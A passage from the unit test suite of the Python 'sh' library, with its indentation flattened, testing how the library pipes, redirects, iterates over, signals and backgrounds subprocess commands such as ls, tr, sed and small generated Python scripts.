try:
python(py.name)
except Exception as e:
self.assertEqual(e.exit_code, 3)
def test_stdin_from_string(self):
from sh import sed
self.assertEqual(sed(_in="one test three", e="s/test/two/").strip(),
"one two three")
def test_ok_code(self):
from sh import ls, ErrorReturnCode_1, ErrorReturnCode_2
exc_to_test = ErrorReturnCode_2
code_to_pass = 2
if IS_MACOS:
exc_to_test = ErrorReturnCode_1
code_to_pass = 1
self.assertRaises(exc_to_test, ls, "/aofwje/garogjao4a/eoan3on")
ls("/aofwje/garogjao4a/eoan3on", _ok_code=code_to_pass)
ls("/aofwje/garogjao4a/eoan3on", _ok_code=[code_to_pass])
ls("/aofwje/garogjao4a/eoan3on", _ok_code=range(code_to_pass + 1))
def test_ok_code_none(self):
py = create_tmp_test("exit(0)")
python(py.name, _ok_code=None)
def test_none_arg(self):
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
maybe_arg = "some"
out = python(py.name, maybe_arg).strip()
self.assertEqual(out, "['some']")
maybe_arg = None
out = python(py.name, maybe_arg).strip()
self.assertEqual(out, "[]")
def test_quote_escaping(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
options, args = parser.parse_args()
print(args)
""")
out = python(py.name, "one two three").strip()
self.assertEqual(out, "['one two three']")
out = python(py.name, "one \"two three").strip()
self.assertEqual(out, "['one \"two three']")
out = python(py.name, "one", "two three").strip()
self.assertEqual(out, "['one', 'two three']")
out = python(py.name, "one", "two \"haha\" three").strip()
self.assertEqual(out, "['one', 'two \"haha\" three']")
out = python(py.name, "one two's three").strip()
self.assertEqual(out, "[\"one two's three\"]")
out = python(py.name, 'one two\'s three').strip()
self.assertEqual(out, "[\"one two's three\"]")
def test_multiple_pipes(self):
import time
py = create_tmp_test("""
import sys
import os
import time
for l in "andrew":
sys.stdout.write(l)
time.sleep(.2)
""")
inc_py = create_tmp_test("""
import sys
while True:
letter = sys.stdin.read(1)
if not letter:
break
sys.stdout.write(chr(ord(letter)+1))
""")
def inc(proc, *args, **kwargs):
return python(proc, "-u", inc_py.name, *args, **kwargs)
class Derp(object):
def __init__(self):
self.times = []
self.stdout = []
self.last_received = None
def agg(self, line):
self.stdout.append(line.strip())
now = time.time()
if self.last_received:
self.times.append(now - self.last_received)
self.last_received = now
derp = Derp()
p = inc(
inc(
inc(
python("-u", py.name, _piped=True),
_piped=True),
_piped=True),
_out=derp.agg)
p.wait()
self.assertEqual("".join(derp.stdout), "dqguhz")
self.assertTrue(all([t > .15 for t in derp.times]))
def test_manual_stdin_string(self):
from sh import tr
out = tr("[:lower:]", "[:upper:]", _in="andrew").strip()
self.assertEqual(out, "ANDREW")
def test_manual_stdin_iterable(self):
from sh import tr
test = ["testing\n", "herp\n", "derp\n"]
out = tr("[:lower:]", "[:upper:]", _in=test)
match = "".join([t.upper() for t in test])
self.assertEqual(out, match)
def test_manual_stdin_file(self):
from sh import tr
import tempfile
test_string = "testing\nherp\nderp\n"
stdin = tempfile.NamedTemporaryFile()
stdin.write(test_string.encode())
stdin.flush()
stdin.seek(0)
out = tr("[:lower:]", "[:upper:]", _in=stdin)
self.assertEqual(out, test_string.upper())
def test_manual_stdin_queue(self):
from sh import tr
try:
from Queue import Queue
except ImportError:
from queue import Queue
test = ["testing\n", "herp\n", "derp\n"]
q = Queue()
for t in test:
q.put(t)
q.put(None) # EOF
out = tr("[:lower:]", "[:upper:]", _in=q)
match = "".join([t.upper() for t in test])
self.assertEqual(out, match)
def test_environment(self):
""" tests that environments variables that we pass into sh commands
exist in the environment, and on the sh module """
import os
# this is the environment we'll pass into our commands
env = {"HERP": "DERP"}
# first we test that the environment exists in our child process as
# we've set it
py = create_tmp_test("""
import os
for key in list(os.environ.keys()):
if key != "HERP":
del os.environ[key]
print(dict(os.environ))
""")
out = python(py.name, _env=env).strip()
self.assertEqual(out, "{'HERP': 'DERP'}")
py = create_tmp_test("""
import os, sys
sys.path.insert(0, os.getcwd())
import sh
for key in list(os.environ.keys()):
if key != "HERP":
del os.environ[key]
print(dict(HERP=sh.HERP))
""")
out = python(py.name, _env=env, _cwd=THIS_DIR).strip()
self.assertEqual(out, "{'HERP': 'DERP'}")
# Test that _env also accepts os.environ which is a mpping but not a dict.
os.environ["HERP"] = "DERP"
out = python(py.name, _env=os.environ, _cwd=THIS_DIR).strip()
self.assertEqual(out, "{'HERP': 'DERP'}")
def test_which(self):
from sh import which, ls
self.assertEqual(which("fjoawjefojawe"), None)
self.assertEqual(which("ls"), str(ls))
def test_which_paths(self):
from sh import which
py = create_tmp_test("""
print("hi")
""")
test_path = dirname(py.name)
_, test_name = os.path.split(py.name)
found_path = which(test_name)
self.assertEqual(found_path, None)
found_path = which(test_name, [test_path])
self.assertEqual(found_path, py.name)
def test_no_close_fds(self):
# guarantee some extra fds in our parent process that don't close on exec. we have to explicitly do this
# because at some point (I believe python 3.4), python started being more stringent with closing fds to prevent
# security vulnerabilities. python 2.7, for example, doesn't set CLOEXEC on tempfile.TemporaryFile()s
#
# https://www.python.org/dev/peps/pep-0446/
tmp = [tempfile.TemporaryFile() for i in range(10)]
for t in tmp:
flags = fcntl.fcntl(t.fileno(), fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(t.fileno(), fcntl.F_SETFD, flags)
py = create_tmp_test("""
import os
print(len(os.listdir("/dev/fd")))
""")
out = python(py.name, _close_fds=False).strip()
# pick some number greater than 4, since it's hard to know exactly how many fds will be open/inherted in the
# child
self.assertGreater(int(out), 7)
for t in tmp:
t.close()
def test_close_fds(self):
# guarantee some extra fds in our parent process that don't close on exec. we have to explicitly do this
# because at some point (I believe python 3.4), python started being more stringent with closing fds to prevent
# security vulnerabilities. python 2.7, for example, doesn't set CLOEXEC on tempfile.TemporaryFile()s
#
# https://www.python.org/dev/peps/pep-0446/
tmp = [tempfile.TemporaryFile() for i in range(10)]
for t in tmp:
flags = fcntl.fcntl(t.fileno(), fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(t.fileno(), fcntl.F_SETFD, flags)
py = create_tmp_test("""
import os
print(os.listdir("/dev/fd"))
""")
out = python(py.name).strip()
self.assertEqual(out, "['0', '1', '2', '3']")
for t in tmp:
t.close()
def test_pass_fds(self):
# guarantee some extra fds in our parent process that don't close on exec. we have to explicitly do this
# because at some point (I believe python 3.4), python started being more stringent with closing fds to prevent
# security vulnerabilities. python 2.7, for example, doesn't set CLOEXEC on tempfile.TemporaryFile()s
#
# https://www.python.org/dev/peps/pep-0446/
tmp = [tempfile.TemporaryFile() for i in range(10)]
for t in tmp:
flags = fcntl.fcntl(t.fileno(), fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(t.fileno(), fcntl.F_SETFD, flags)
last_fd = tmp[-1].fileno()
py = create_tmp_test("""
import os
print(os.listdir("/dev/fd"))
""")
out = python(py.name, _pass_fds=[last_fd]).strip()
inherited = [0, 1, 2, 3, last_fd]
inherited_str = [str(i) for i in inherited]
self.assertEqual(out, str(inherited_str))
for t in tmp:
t.close()
def test_no_arg(self):
import pwd
from sh import whoami
u1 = whoami().strip()
u2 = pwd.getpwuid(os.geteuid())[0]
self.assertEqual(u1, u2)
def test_incompatible_special_args(self):
from sh import ls
self.assertRaises(TypeError, ls, _iter=True, _piped=True)
def test_invalid_env(self):
from sh import ls
exc = TypeError
if IS_PY2 and MINOR_VER == 6:
exc = ValueError
self.assertRaises(exc, ls, _env="XXX")
self.assertRaises(exc, ls, _env={"foo": 123})
self.assertRaises(exc, ls, _env={123: "bar"})
def test_exception(self):
from sh import ErrorReturnCode_2
py = create_tmp_test("""
exit(2)
""")
self.assertRaises(ErrorReturnCode_2, python, py.name)
def test_piped_exception1(self):
from sh import ErrorReturnCode_2
py = create_tmp_test("""
import sys
sys.stdout.write("line1\\n")
sys.stdout.write("line2\\n")
exit(2)
""")
py2 = create_tmp_test("")
def fn():
list(python(python(py.name, _piped=True), "-u", py2.name, _iter=True))
self.assertRaises(ErrorReturnCode_2, fn)
def test_piped_exception2(self):
from sh import ErrorReturnCode_2
py = create_tmp_test("""
import sys
sys.stdout.write("line1\\n")
sys.stdout.write("line2\\n")
exit(2)
""")
py2 = create_tmp_test("")
def fn():
python(python(py.name, _piped=True), "-u", py2.name)
self.assertRaises(ErrorReturnCode_2, fn)
def test_command_not_found(self):
from sh import CommandNotFound
def do_import():
from sh import aowjgoawjoeijaowjellll # noqa: F401
self.assertRaises(ImportError, do_import)
def do_import():
import sh
sh.awoefaowejfw
self.assertRaises(CommandNotFound, do_import)
def do_import():
import sh
sh.Command("ofajweofjawoe")
self.assertRaises(CommandNotFound, do_import)
def test_command_wrapper_equivalence(self):
from sh import Command, ls, which
self.assertEqual(Command(which("ls")), ls)
def test_doesnt_execute_directories(self):
save_path = os.environ['PATH']
bin_dir1 = tempfile.mkdtemp()
bin_dir2 = tempfile.mkdtemp()
gcc_dir1 = os.path.join(bin_dir1, 'gcc')
gcc_file2 = os.path.join(bin_dir2, 'gcc')
try:
os.environ['PATH'] = os.pathsep.join((bin_dir1, bin_dir2))
# a folder named 'gcc', its executable, but should not be
# discovered by internal which(1)-clone
os.makedirs(gcc_dir1)
# an executable named gcc -- only this should be executed
bunk_header = '#!/bin/sh\necho $*'
with open(gcc_file2, "w") as h:
h.write(bunk_header)
os.chmod(gcc_file2, int(0o755))
import sh
from sh import gcc
if IS_PY3:
self.assertEqual(gcc._path,
gcc_file2.encode(sh.DEFAULT_ENCODING))
else:
self.assertEqual(gcc._path, gcc_file2)
self.assertEqual(gcc('no-error').stdout.strip(),
'no-error'.encode("ascii"))
finally:
os.environ['PATH'] = save_path
if exists(gcc_file2):
os.unlink(gcc_file2)
if exists(gcc_dir1):
os.rmdir(gcc_dir1)
if exists(bin_dir1):
os.rmdir(bin_dir1)
if exists(bin_dir1):
os.rmdir(bin_dir2)
def test_multiple_args_short_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", dest="long_option")
options, args = parser.parse_args()
print(len(options.long_option.split()))
""")
num_args = int(python(py.name, l="one two three")) # noqa: E741
self.assertEqual(num_args, 3)
num_args = int(python(py.name, "-l", "one's two's three's"))
self.assertEqual(num_args, 3)
def test_multiple_args_long_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", "--long-option", dest="long_option")
options, args = parser.parse_args()
print(len(options.long_option.split()))
""")
num_args = int(python(py.name, long_option="one two three",
nothing=False))
self.assertEqual(num_args, 3)
num_args = int(python(py.name, "--long-option", "one's two's three's"))
self.assertEqual(num_args, 3)
def test_short_bool_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-s", action="store_true", default=False, dest="short_option")
options, args = parser.parse_args()
print(options.short_option)
""")
self.assertTrue(python(py.name, s=True).strip() == "True")
self.assertTrue(python(py.name, s=False).strip() == "False")
self.assertTrue(python(py.name).strip() == "False")
def test_long_bool_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", "--long-option", action="store_true", default=False, dest="long_option")
options, args = parser.parse_args()
print(options.long_option)
""")
self.assertTrue(python(py.name, long_option=True).strip() == "True")
self.assertTrue(python(py.name).strip() == "False")
def test_false_bool_ignore(self):
py = create_tmp_test("""
import sys
print(sys.argv[1:])
""")
test = True
self.assertEqual(python(py.name, test and "-n").strip(), "['-n']")
test = False
self.assertEqual(python(py.name, test and "-n").strip(), "[]")
def test_composition(self):
from sh import ls, wc
c1 = int(wc(ls("-A1"), l=True)) # noqa: E741
c2 = len(os.listdir("."))
self.assertEqual(c1, c2)
def test_incremental_composition(self):
from sh import ls, wc
c1 = int(wc(ls("-A1", _piped=True), l=True).strip()) # noqa: E741
c2 = len(os.listdir("."))
self.assertEqual(c1, c2)
def test_short_option(self):
from sh import sh
s1 = sh(c="echo test").strip()
s2 = "test"
self.assertEqual(s1, s2)
def test_long_option(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-l", "--long-option", action="store", default="", dest="long_option")
options, args = parser.parse_args()
print(options.long_option.upper())
""")
self.assertTrue(python(py.name, long_option="testing").strip() == "TESTING")
self.assertTrue(python(py.name).strip() == "")
def test_raw_args(self):
py = create_tmp_test("""
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--long_option", action="store", default=None,
dest="long_option1")
parser.add_option("--long-option", action="store", default=None,
dest="long_option2")
options, args = parser.parse_args()
if options.long_option1:
print(options.long_option1.upper())
else:
print(options.long_option2.upper())
""")
self.assertEqual(python(py.name,
{"long_option": "underscore"}).strip(), "UNDERSCORE")
self.assertEqual(python(py.name, long_option="hyphen").strip(), "HYPHEN")
def test_custom_separator(self):
py = create_tmp_test("""
import sys
print(sys.argv[1])
""")
opt = {"long-option": "underscore"}
correct = "--long-option=custom=underscore"
out = python(py.name, opt, _long_sep="=custom=").strip()
self.assertEqual(out, correct)
# test baking too
correct = "--long-option=baked=underscore"
python_baked = python.bake(py.name, opt, _long_sep="=baked=")
out = python_baked().strip()
self.assertEqual(out, correct)
def test_custom_separator_space(self):
py = create_tmp_test("""
import sys
print(str(sys.argv[1:]))
""")
opt = {"long-option": "space"}
correct = ["--long-option", "space"]
out = python(py.name, opt, _long_sep=" ").strip()
self.assertEqual(out, str(correct))
def test_custom_long_prefix(self):
py = create_tmp_test("""
import sys
print(sys.argv[1])
""")
out = python(py.name, {"long-option": "underscore"},
_long_prefix="-custom-").strip()
self.assertEqual(out, "-custom-long-option=underscore")
out = python(py.name, {"long-option": True},
_long_prefix="-custom-").strip()
self.assertEqual(out, "-custom-long-option")
# test baking too
out = python.bake(py.name, {"long-option": "underscore"},
_long_prefix="-baked-")().strip()
self.assertEqual(out, "-baked-long-option=underscore")
out = python.bake(py.name, {"long-option": True},
_long_prefix="-baked-")().strip()
self.assertEqual(out, "-baked-long-option")
def test_command_wrapper(self):
from sh import Command, which
ls = Command(which("ls"))
wc = Command(which("wc"))
c1 = int(wc(ls("-A1"), l=True)) # noqa: E741
c2 = len(os.listdir("."))
self.assertEqual(c1, c2)
def test_background(self):
from sh import sleep
import time
start = time.time()
sleep_time = .5
p = sleep(sleep_time, _bg=True)
now = time.time()
self.assertLess(now - start, sleep_time)
p.wait()
now = time.time()
self.assertGreater(now - start, sleep_time)
def test_background_exception(self):
from sh import ls, ErrorReturnCode_1, ErrorReturnCode_2
p = ls("/ofawjeofj", _bg=True, _bg_exc=False) # should not raise
exc_to_test = ErrorReturnCode_2
if IS_MACOS:
exc_to_test = ErrorReturnCode_1
self.assertRaises(exc_to_test, p.wait) # should raise
def test_with_context(self):
from sh import whoami
import getpass
py = create_tmp_test("""
import sys
import os
import subprocess
print("with_context")
subprocess.Popen(sys.argv[1:], shell=False).wait()
""")
cmd1 = python.bake(py.name, _with=True)
with cmd1:
out = whoami()
self.assertIn("with_context", out)
self.assertIn(getpass.getuser(), out)
def test_with_context_args(self):
from sh import whoami
import getpass
py = create_tmp_test("""
import sys
import os
import subprocess
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-o", "--opt", action="store_true", default=False, dest="opt")
options, args = parser.parse_args()
if options.opt:
subprocess.Popen(args[0], shell=False).wait()
""")
with python(py.name, opt=True, _with=True):
out = whoami()
self.assertTrue(getpass.getuser() == out.strip())
with python(py.name, _with=True):
out = whoami()
self.assertTrue(out == "")
def test_binary_input(self):
py = create_tmp_test("""
import sys
data = sys.stdin.read()
sys.stdout.write(data)
""")
data = b'1234'
out = python(py.name, _in=data)
self.assertEqual(out, "1234")
def test_err_to_out(self):
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stdout.flush()
sys.stderr.write("stderr")
sys.stderr.flush()
""")
stdout = python(py.name, _err_to_out=True)
self.assertEqual(stdout, "stdoutstderr")
def test_err_to_out_and_sys_stdout(self):
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stdout.flush()
sys.stderr.write("stderr")
sys.stderr.flush()
""")
master, slave = os.pipe()
stdout = python(py.name, _err_to_out=True, _out=slave)
self.assertEqual(stdout, "")
self.assertEqual(os.read(master, 12), b"stdoutstderr")
def test_err_piped(self):
py = create_tmp_test("""
import sys
sys.stderr.write("stderr")
""")
py2 = create_tmp_test("""
import sys
while True:
line = sys.stdin.read()
if not line:
break
sys.stdout.write(line)
""")
out = python(python("-u", py.name, _piped="err"), "-u", py2.name)
self.assertEqual(out, "stderr")
def test_out_redirection(self):
import tempfile
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
file_obj = tempfile.NamedTemporaryFile()
out = python(py.name, _out=file_obj)
self.assertEqual(len(out), 0)
file_obj.seek(0)
actual_out = file_obj.read()
file_obj.close()
self.assertNotEqual(len(actual_out), 0)
# test with tee
file_obj = tempfile.NamedTemporaryFile()
out = python(py.name, _out=file_obj, _tee=True)
self.assertGreater(len(out), 0)
file_obj.seek(0)
actual_out = file_obj.read()
file_obj.close()
self.assertGreater(len(actual_out), 0)
def test_err_redirection(self):
import tempfile
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
file_obj = tempfile.NamedTemporaryFile()
p = python("-u", py.name, _err=file_obj)
file_obj.seek(0)
stderr = file_obj.read().decode()
file_obj.close()
self.assertEqual(p.stdout, b"stdout")
self.assertEqual(stderr, "stderr")
self.assertEqual(len(p.stderr), 0)
# now with tee
file_obj = tempfile.NamedTemporaryFile()
p = python(py.name, _err=file_obj, _tee="err")
file_obj.seek(0)
stderr = file_obj.read().decode()
file_obj.close()
self.assertEqual(p.stdout, b"stdout")
self.assertEqual(stderr, "stderr")
self.assertGreater(len(p.stderr), 0)
def test_tty_tee(self):
py = create_tmp_test("""
import sys
sys.stdout.write("stdout")
""")
read, write = pty.openpty()
out = python("-u", py.name, _out=write).stdout
tee = os.read(read, 6)
self.assertEqual(out, b"")
self.assertEqual(tee, b"stdout")
os.close(write)
os.close(read)
read, write = pty.openpty()
out = python("-u", py.name, _out=write, _tee=True).stdout
tee = os.read(read, 6)
self.assertEqual(out, b"stdout")
self.assertEqual(tee, b"stdout")
os.close(write)
os.close(read)
def test_err_redirection_actual_file(self):
import tempfile
file_obj = tempfile.NamedTemporaryFile()
py = create_tmp_test("""
import sys
import os
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
stdout = python("-u", py.name, _err=file_obj.name).wait()
file_obj.seek(0)
stderr = file_obj.read().decode()
file_obj.close()
self.assertTrue(stdout == "stdout")
self.assertTrue(stderr == "stderr")
def test_subcommand_and_bake(self):
import getpass
py = create_tmp_test("""
import sys
import os
import subprocess
print("subcommand")
subprocess.Popen(sys.argv[1:], shell=False).wait()
""")
cmd1 = python.bake(py.name)
out = cmd1.whoami()
self.assertIn("subcommand", out)
self.assertIn(getpass.getuser(), out)
def test_multiple_bakes(self):
py = create_tmp_test("""
import sys
sys.stdout.write(str(sys.argv[1:]))
""")
out = python.bake(py.name).bake("bake1").bake("bake2")()
self.assertEqual("['bake1', 'bake2']", out)
def test_arg_preprocessor(self):
py = create_tmp_test("""
import sys
sys.stdout.write(str(sys.argv[1:]))
""")
def arg_preprocess(args, kwargs):
args.insert(0, "preprocessed")
kwargs["a-kwarg"] = 123
return args, kwargs
cmd = python.bake(py.name, _arg_preprocess=arg_preprocess)
out = cmd("arg")
self.assertEqual("['preprocessed', 'arg', '--a-kwarg=123']", out)
def test_bake_args_come_first(self):
from sh import ls
ls = ls.bake(h=True)
ran = ls("-la").ran
ft = ran.index("-h")
self.assertIn("-la", ran[ft:])
def test_output_equivalence(self):
from sh import whoami
iam1 = whoami()
iam2 = whoami()
self.assertEqual(iam1, iam2)
# https://github.com/amoffat/sh/pull/252
def test_stdout_pipe(self):
py = create_tmp_test(r"""
import sys
sys.stdout.write("foobar\n")
""")
read_fd, write_fd = os.pipe()
python(py.name, _out=write_fd, u=True)
def alarm(sig, action):
self.fail("Timeout while reading from pipe")
import signal
signal.signal(signal.SIGALRM, alarm)
signal.alarm(3)
data = os.read(read_fd, 100)
self.assertEqual(b"foobar\n", data)
signal.alarm(0)
signal.signal(signal.SIGALRM, signal.SIG_DFL)
def test_stdout_callback(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print(i)
""")
stdout = []
def agg(line):
stdout.append(line)
p = python("-u", py.name, _out=agg)
p.wait()
self.assertEqual(len(stdout), 5)
def test_stdout_callback_no_wait(self):
import time
py = create_tmp_test("""
import sys
import os
import time
for i in range(5):
print(i)
time.sleep(.5)
""")
stdout = []
def agg(line): stdout.append(line)
python("-u", py.name, _out=agg, _bg=True)
# we give a little pause to make sure that the NamedTemporaryFile
# exists when the python process actually starts
time.sleep(.5)
self.assertNotEqual(len(stdout), 5)
def test_stdout_callback_line_buffered(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print("herpderp")
""")
stdout = []
def agg(line): stdout.append(line)
p = python("-u", py.name, _out=agg, _out_bufsize=1)
p.wait()
self.assertEqual(len(stdout), 5)
def test_stdout_callback_line_unbuffered(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print("herpderp")
""")
stdout = []
def agg(char): stdout.append(char)
p = python("-u", py.name, _out=agg, _out_bufsize=0)
p.wait()
# + 5 newlines
self.assertEqual(len(stdout), len("herpderp") * 5 + 5)
def test_stdout_callback_buffered(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): sys.stdout.write("herpderp")
""")
stdout = []
def agg(chunk): stdout.append(chunk)
p = python("-u", py.name, _out=agg, _out_bufsize=4)
p.wait()
self.assertEqual(len(stdout), len("herp") / 2 * 5)
def test_stdout_callback_with_input(self):
py = create_tmp_test("""
import sys
import os
IS_PY3 = sys.version_info[0] == 3
if IS_PY3: raw_input = input
for i in range(5): print(str(i))
derp = raw_input("herp? ")
print(derp)
""")
def agg(line, stdin):
if line.strip() == "4":
stdin.put("derp\n")
p = python("-u", py.name, _out=agg, _tee=True)
p.wait()
self.assertIn("derp", p)
def test_stdout_callback_exit(self):
py = create_tmp_test("""
import sys
import os
for i in range(5): print(i)
""")
stdout = []
def agg(line):
line = line.strip()
stdout.append(line)
if line == "2":
return True
p = python("-u", py.name, _out=agg, _tee=True)
p.wait()
self.assertIn("4", p)
self.assertNotIn("4", stdout)
def test_stdout_callback_terminate(self):
import signal
py = create_tmp_test("""
import sys
import os
import time
for i in range(5):
print(i)
time.sleep(.5)
""")
stdout = []
def agg(line, stdin, process):
line = line.strip()
stdout.append(line)
if line == "3":
process.terminate()
return True
import sh
caught_signal = False
try:
p = python("-u", py.name, _out=agg, _bg=True)
p.wait()
except sh.SignalException_SIGTERM:
caught_signal = True
self.assertTrue(caught_signal)
self.assertEqual(p.process.exit_code, -signal.SIGTERM)
self.assertNotIn("4", p)
self.assertNotIn("4", stdout)
def test_stdout_callback_kill(self):
import signal
py = create_tmp_test("""
import sys
import os
import time
for i in range(5):
print(i)
time.sleep(.5)
""")
stdout = []
def agg(line, stdin, process):
line = line.strip()
stdout.append(line)
if line == "3":
process.kill()
return True
import sh
caught_signal = False
try:
p = python("-u", py.name, _out=agg, _bg=True)
p.wait()
except sh.SignalException_SIGKILL:
caught_signal = True
self.assertTrue(caught_signal)
self.assertEqual(p.process.exit_code, -signal.SIGKILL)
self.assertNotIn("4", p)
self.assertNotIn("4", stdout)
def test_general_signal(self):
from signal import SIGINT
py = create_tmp_test("""
import sys
import os
import time
import signal
def sig_handler(sig, frame):
print(10)
exit(0)
signal.signal(signal.SIGINT, sig_handler)
for i in range(5):
print(i)
sys.stdout.flush()
time.sleep(0.5)
""")
stdout = []
def agg(line, stdin, process):
line = line.strip()
stdout.append(line)
if line == "3":
process.signal(SIGINT)
return True
p = python(py.name, _out=agg, _tee=True)
p.wait()
self.assertEqual(p.process.exit_code, 0)
self.assertEqual(p, "0\n1\n2\n3\n10\n")
def test_iter_generator(self):
py = create_tmp_test("""
import sys
import os
import time
for i in range(42):
print(i)
sys.stdout.flush()
""")
out = []
for line in python(py.name, _iter=True):
out.append(int(line.strip()))
self.assertEqual(len(out), 42)
self.assertEqual(sum(out), 861)
def test_iter_unicode(self):
# issue https://github.com/amoffat/sh/issues/224
test_string = "\xe4\xbd\x95\xe4\xbd\x95\n" * 150 # len > buffer_s
txt = create_tmp_test(test_string)
for line in sh.cat(txt.name, _iter=True):
break
self.assertLess(len(line), 1024)
def test_nonblocking_iter(self):
from errno import EWOULDBLOCK
py = create_tmp_test("""
import time
import sys
time.sleep(1)
sys.stdout.write("stdout")
""")
count = 0
value = None
for line in python(py.name, _iter_noblock=True):
if line == EWOULDBLOCK:
count += 1
else:
value = line
self.assertGreater(count, 0)
self.assertEqual(value, "stdout")
py = create_tmp_test("""
import time
import sys
time.sleep(1)
sys.stderr.write("stderr")
""")
count = 0
value = None
for line in python(py.name, _iter_noblock="err"):
if line == EWOULDBLOCK:
count += 1
else:
value = line
self.assertGreater(count, 0)
self.assertEqual(value, "stderr")
def test_for_generator_to_err(self):
py = create_tmp_test("""
import sys
import os
for i in range(42):
sys.stderr.write(str(i)+"\\n")
""")
out = []
for line in python("-u", py.name, _iter="err"):
out.append(line)
self.assertEqual(len(out), 42)
# verify that nothing is going to stdout
out = []
for line in python("-u", py.name, _iter="out"):
out.append(line)
self.assertEqual(len(out), 0)
def test_sigpipe(self):
py1 = create_tmp_test("""
import sys
import os
import time
import signal
# by default, python disables SIGPIPE, in favor of using IOError exceptions, so
# let's put that back to the system default where we terminate with a signal
# exit code
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
for letter in "andrew":
time.sleep(0.6)
print(letter)
""")
py2 = create_tmp_test("""
import sys
import os
import time
while True:
line = sys.stdin.readline()
if not line:
break
print(line.strip().upper())
exit(0)
""")
p1 = python("-u", py1.name, _piped="out")
p2 = python(p1, "-u", py2.name)
# SIGPIPE should happen, but it shouldn't be an error, since _piped is
# truthful
self.assertEqual(-p1.exit_code, signal.SIGPIPE)
self.assertEqual(p2.exit_code, 0)
def test_piped_generator(self):
import time
py1 = create_tmp_test("""
import sys
import os
import time
for letter in "andrew":
time.sleep(0.6)
print(letter)
""")
py2 = create_tmp_test("""
import sys
import os
import time
while True:
line = sys.stdin.readline()
if not line:
break
print(line.strip().upper())
""")
times = []
last_received = None
letters = ""
for line in python(python("-u", py1.name, _piped="out"), "-u",
py2.name, _iter=True):
letters += line.strip()
now = time.time()
if last_received:
times.append(now - last_received)
last_received = now
self.assertEqual("ANDREW", letters)
self.assertTrue(all([t > .3 for t in times]))
def test_generator_and_callback(self):
py = create_tmp_test("""
import sys
import os
for i in range(42):
sys.stderr.write(str(i * 2)+"\\n")
print(i)
""")
stderr = []
def agg(line):
stderr.append(int(line.strip()))
out = []
for line in python("-u", py.name, _iter=True, _err=agg):
out.append(line)
self.assertEqual(len(out), 42)
self.assertEqual(sum(stderr), 1722)
def test_cast_bg(self):
py = create_tmp_test("""
import sys
import time
time.sleep(0.5)
sys.stdout.write(sys.argv[1])
""")
self.assertEqual(int(python(py.name, "123", _bg=True)), 123)
self.assertEqual(long(python(py.name, "456", _bg=True)), 456)
self.assertEqual(float(python(py.name, "789", _bg=True)), 789.0)
def test_cmd_eq(self):
py = create_tmp_test("")
cmd1 = python.bake(py.name, "-u")
cmd2 = python.bake(py.name, "-u")
cmd3 = python.bake(py.name)
self.assertEqual(cmd1, cmd2)
self.assertNotEqual(cmd1, cmd3)
def test_fg(self):
py = create_tmp_test("exit(0)")
# notice we're using `system_python`, and not `python`. this is because
# `python` has an env baked into it, and we want `_env` to be None for
# coverage
system_python(py.name, _fg=True)
def test_fg_false(self):
""" https://github.com/amoffat/sh/issues/520 """
py = create_tmp_test("print('hello')")
buf = StringIO()
python(py.name, _fg=False, _out=buf)
self.assertEqual(buf.getvalue(), "hello\n")
def test_fg_true(self):
""" https://github.com/amoffat/sh/issues/520 """
py = create_tmp_test("print('hello')")
buf = StringIO()
self.assertRaises(TypeError, python, py.name, _fg=True, _out=buf)
def test_fg_env(self):
py = create_tmp_test("""
import os
code = int(os.environ.get("EXIT", "0"))
exit(code)
""")
env = os.environ.copy()
env["EXIT"] = "3"
self.assertRaises(sh.ErrorReturnCode_3, python, py.name, _fg=True,
_env=env)
def test_fg_alternative(self):
py = create_tmp_test("exit(0)")
python(py.name, _in=sys.stdin, _out=sys.stdout, _err=sys.stderr)
def test_fg_exc(self):
py = create_tmp_test("exit(1)")
self.assertRaises(sh.ErrorReturnCode_1, python, py.name, _fg=True)
def test_out_filename(self):
outfile = tempfile.NamedTemporaryFile()
py = create_tmp_test("print('output')")
python(py.name, _out=outfile.name)
outfile.seek(0)
self.assertEqual(b"output\n", outfile.read())
def test_bg_exit_code(self):
py = create_tmp_test("""
import time
time.sleep(1)
exit(49)
""")
p = python(py.name, _ok_code=49, _bg=True)
self.assertEqual(49, p.exit_code)
def test_cwd(self):
from sh import pwd
from os.path import realpath
self.assertEqual(str(pwd(_cwd="/tmp")), realpath("/tmp") + "\n")
self.assertEqual(str(pwd(_cwd="/etc")), realpath("/etc") + "\n")
def test_cwd_fg(self):
td = realpath(tempfile.mkdtemp())
py = create_tmp_test("""
import sh
import os
from os.path import realpath
orig = realpath(os.getcwd())
print(orig)
sh.pwd(_cwd="{newdir}", _fg=True)
print(realpath(os.getcwd()))
""".format(newdir=td))
orig, newdir, restored = python(py.name).strip().split("\n")
newdir = realpath(newdir)
self.assertEqual(newdir, td)
self.assertEqual(orig, restored)
self.assertNotEqual(orig, newdir)
os.rmdir(td)
def test_huge_piped_data(self):
from sh import tr
stdin = tempfile.NamedTemporaryFile()
data = "herpderp" * 4000 + "\n"
stdin.write(data.encode())
stdin.flush()
stdin.seek(0)
